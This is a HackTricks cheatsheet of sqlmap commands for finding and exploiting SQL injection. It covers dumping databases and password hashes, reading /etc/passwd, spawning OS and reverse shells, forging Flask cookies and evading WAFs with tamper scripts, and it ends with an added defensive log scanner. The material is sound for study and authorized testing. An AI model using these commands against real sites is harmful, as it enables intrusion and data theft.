SQLMap - Cheatsheet


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic arguments for SQLmap

Generic

```bash
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char
```

Retrieve Information

Internal

```bash
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames of DB
--passwords #Get passwords of users in DB
--privileges #Get privileges
```

DB data

```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
```

SQLMapping is a practical tool that generates commands and provides a complete overview, both basic and advanced, of SQLMap. It includes ToolTips that explain each aspect of the tool, detailing every option so you can refine your usage and understand how to use it effectively and efficiently.

Injection place

From Burp/ZAP capture

Capture the request and create a req.txt file

```bash
sqlmap -r req.txt --current-user
```

GET Request Injection

```bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
```

POST Request Injection

```bash
sqlmap -u "http://example.com" --data "username=*&password=*"
```

Injections in Headers and other HTTP Methods

```bash
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'
```

Indicate the string shown when the injection is successful

```bash
--string="string_showed_when_TRUE"
```

Improve the detection technique

If you found a SQLi but sqlmap did not detect it, you can force the detection technique using arguments like --prefix or --suffix, or, if the case is more complex, add it to the payloads used by sqlmap in /usr/share/sqlmap/data/xml/payloads/time_blind.xml, for example, for time-based blind injection.

Eval

Sqlmap allows the use of -e or --eval to process each payload before sending it with a python one-liner. This makes it very easy and fast to process the payload in custom ways before sending it. In the following example the flask session cookie is signed by flask with a known secret before it is sent:

```bash
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
```

Shell

```bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```

Read File

```bash
--file-read=/etc/passwd
```

Crawl a website with SQLmap and auto-exploit

```bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
```

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Second Order Injection

```bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt --dbms MySQL --second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" --dbs
```

Read this post about how to perform simple and complicated second order injections with sqlmap.

Customizing Injection

Set a suffix

```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```

Prefix

```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
```

Help finding boolean injection

```bash
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
```

Tamper

Remember that you can create your own tamper in python and it's very simple. You can find a tamper example in the Second Order Injection page here.

```bash
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
```
| Tamper | Description |
|---|---|
| apostrophemask.py | Replaces the apostrophe character with its UTF-8 full width counterpart |
| apostrophenullencode.py | Replaces the apostrophe character with its illegal double unicode counterpart |
| appendnullbyte.py | Appends an encoded NULL byte character at the end of the payload |
| base64encode.py | Base64-encodes all characters in a given payload |
| between.py | Replaces the greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
| bluecoat.py | Replaces the space character after a SQL statement with a valid random blank character. Afterwards replaces the = character with the LIKE operator |
| chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded ones) |
| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' |
| commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' |
| concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' |
| charencode.py | Url-encodes all characters in a given payload (not processing already encoded ones) |
| charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded ones). "%u0022" |
| charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded ones). "\u0022" |
| equaltolike.py | Replaces all occurrences of the equal operator ('=') with the 'LIKE' operator |
| escapequotes.py | Slash-escapes quotes (' and ") |
| greatest.py | Replaces the greater than operator ('>') with its 'GREATEST' counterpart |
| halfversionedmorekeywords.py | Adds a versioned MySQL comment before each keyword |
| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' |
| modsecurityversioned.py | Embraces the complete query with a versioned comment |
| modsecurityzeroversioned.py | Embraces the complete query with a zero-versioned comment |
| multiplespaces.py | Adds multiple spaces around SQL keywords |
| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters |
| percentage.py | Adds a percentage sign ('%') in front of each character |
| overlongutf8.py | Converts all characters in a given payload (not processing already encoded ones) |
| randomcase.py | Replaces each keyword character with a random case value |
| randomcomments.py | Adds random comments to SQL keywords |
| securesphere.py | Appends a specially crafted string |
| sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
| space2comment.py | Replaces the space character (' ') with comments |
| space2dash.py | Replaces the space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
| space2hash.py | Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2morehash.py | Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2mssqlblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters |
| space2mssqlhash.py | Replaces the space character (' ') with a pound character ('#') followed by a new line ('\n') |
| space2mysqlblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters |
| space2mysqldash.py | Replaces the space character (' ') with a dash comment ('--') followed by a new line ('\n') |
| space2plus.py | Replaces the space character (' ') with a plus ('+') |
| space2randomblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters |
| symboliclogical.py | Replaces the AND and OR logical operators with their symbolic counterparts (&& and \|\|) |
| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
| unmagicquotes.py | Replaces the quote character (') with the multi-byte combo %bf%27 together with a generic comment at the end (to make it work) |
| uppercase.py | Replaces each keyword character with its upper case value, e.g. 'INSERT' |
| varnish.py | Appends an HTTP header 'X-originating-IP' |
| versionedkeywords.py | Encloses each non-function keyword in a versioned MySQL comment |
| versionedmorekeywords.py | Encloses each keyword in a versioned MySQL comment |
| xforwardedfor.py | Appends a fake HTTP header 'X-Forwarded-For' |
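As an added defensive example (not part of the original cheatsheet nor of sqlmap itself), the following Python scanner undoes several of the tamper transformations listed above and flags sqlmap-style requests in web access logs by indicators this page names: the sqlmap User-Agent, UNION/SELECT carrying the --union-char marker, boolean and time-based probes, the %bf%27 prefix of unmagicquotes and the sp_password suffix. The log lines, IP addresses, log format and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic): ip - - [time] "METHOD path PROTO" status "UA"
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?id=1 HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=1%20AND%201=1 HTTP/1.1" 200 "sqlmap/1.7"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=1/**/uNiOn/**/SeLeCt/**/GsFRts2 HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=1%bf%27%20OR%20sleep(5)--%20 HTTP/1.1" 500 "Mozilla/5.0"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d+) "(?P<ua>[^"]*)"$')

def normalise(path):
    """Reverse the encodings applied by the tampers in the table above so obfuscated payloads match plain SQL."""
    s = unquote_plus(unquote_plus(path))                  # charencode, chardoubleencode, space2plus
    s = re.sub(r'%u00([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)  # charunicodeencode
    s = s.replace('/**/', ' ')                            # space2comment
    s = re.sub(r'(?:--|#)[^\n]*\n', ' ', s)               # space2dash, space2hash, space2mysqldash
    return re.sub(r'\s+', ' ', s).lower()                 # multiplespaces, randomcase, uppercase

RULES = [  # each indicator is tied to an option or tamper named on this page
    ('sqlmap-ua',     lambda raw, norm, ua: 'sqlmap' in ua.lower()),
    ('union-select',  lambda raw, norm, ua: re.search(r'\bunion\b.*\bselect\b', norm) is not None),
    ('boolean-blind', lambda raw, norm, ua: re.search(r'\b(and|or)\b \d+ ?= ?\d+', norm) is not None),
    ('time-blind',    lambda raw, norm, ua: re.search(r'\b(sleep|benchmark|waitfor)\b', norm) is not None),
    ('unmagicquotes', lambda raw, norm, ua: '%bf%27' in raw.lower()),
    ('sp_password',   lambda raw, norm, ua: 'sp_password' in norm),
]

def scan_line(line):
    """Return (client_ip, [matched rule names]) for one log line, or None if it does not parse or trips no rule."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw, ua = m['path'], m['ua']
    norm = normalise(raw)
    hits = [name for name, check in RULES if check(raw, norm, ua)]
    return (m['ip'], hits) if hits else None

def scan_log(lines):
    """Map each flagged client IP to the set of indicators it triggered."""
    report = {}
    for line in lines:
        result = scan_line(line)
        if result:
            report.setdefault(result[0], set()).update(result[1])
    return report
```

Running `scan_log(SAMPLE_LOG)` reports only 10.0.0.9, with all four injection indicators plus the User-Agent hit; the normal request from 10.0.0.5 is left alone.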
